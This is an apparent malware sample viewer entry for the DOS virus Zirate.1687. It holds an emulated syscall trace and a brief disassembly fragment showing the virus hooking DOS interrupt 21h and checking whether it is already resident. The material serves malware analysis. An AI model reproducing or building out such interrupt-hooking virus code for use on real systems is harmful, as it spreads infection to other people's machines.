Sample viewer

vx.netlux.org/Virus.DOS.Zirate.1687

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T21:53:36.376454799Z 250 PC: 152a6 | UNKNOWN!
2018-12-17T21:53:36.378090939Z 53 PC: 152fb | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T21:53:36.379035665Z 37 PC: 1530b | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T21:53:36.379955385Z 42 PC: 152de | Get date 0x152de: mov word ptr es:[0x10e], dx
0x152e3: mov word ptr es:[0x110], cx
0x152e8: pop es
0x152e9: pop ax
0x152ea: pop si
0x152eb: push es
0x152ec: pop ds
0x152ed: mov ss, word ptr cs:[si + 0x108]
0x152f2: ljmp ptr cs:[si + 7]
0x152f6: mov ax, 0x3521
0x152f9: int 0x21
0x152fb: mov word ptr [0x22f], bx
0x152ff: mov word ptr [0x231], es
0x15303: mov ax, 0x2521
0x15306: mov dx, 0x1bc
0x15309: int 0x21
0x1530b: ret
0x1530c: cmp ax, 0xfa4d
0x1530f: jne 0x15317
0x15311: push cs